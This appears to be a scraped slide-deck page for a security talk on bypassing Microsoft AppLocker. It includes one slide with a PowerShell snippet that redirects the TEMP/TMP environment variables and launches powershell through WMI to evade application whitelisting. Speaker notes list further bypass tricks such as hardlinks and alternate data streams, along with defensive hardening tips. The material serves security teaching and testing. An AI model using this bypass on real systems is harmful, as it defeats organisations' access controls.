Downloaded 31 times
App-o-Lockalypse now!
- 20.
- 27.
- 29.
- 41. $CurrTemp = $env:temp $CurrTmp= $env:tmp $TEMPBypassPath = "C:windowstemp" $TMPBypassPath = "C:windowstemp" Set-ItemProperty -Path 'hkcu:Environment' -Name Tmp -Value "$TEMPBypassPath" Set-ItemProperty -Path 'hkcu:Environment' -Name Temp -Value "$TMPBypassPath" Invoke-WmiMethod -Class win32_process -Name create -ArgumentList "powershell" sleep 5 #Set it back Set-ItemProperty -Path 'hkcu:Environment' -Name Tmp -Value $CurrTmp Set-ItemProperty -Path 'hkcu:Environment' -Name Temp -Value $CurrTemp
Editor's Notes
- #2 https://pixabay.com/no/apokalyptiske-krigen-fare-374208/
- #9 * Modern management
- #10 https://github.com/kasif-dekel/Microsoft-Applocker-Bypass
- #14 Challenge is not allowing stuff, but stopping unwanted stuff like signed ms files etc… Aaron Margosis
- #15 3 types of rules.
- #16 Importance of this service
- #22 Explain them
- #23 Explain them
- #24 Explain them
- #25 Explain them
- #26 Explain them
- #27 Source: https://pixabay.com/no/apocalypse-krigen-katastrofe-2459465/
- #40 https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc783530(v=ws.10)
- #45 SHOW: C:\Windows\System32\Tasks\Microsoft\Windows\SyncCenter – Take ownership – change acls…. C:\Windows\System32\com\dmp – fsutil hardlink Alternate data streams
- #47 Gunnar Haslinger
- #51 Awesome writeup! Does not work if you have DLL enforcement on!
- #55 https://pixabay.com/en/apocalypse-city-end-of-the-world-2921093/
- #57 Only add needed signers Use sccm to deploy software – Check managed installer...
- #67 AaronLocker is vulnerable to ADS – But will be fixed in next release.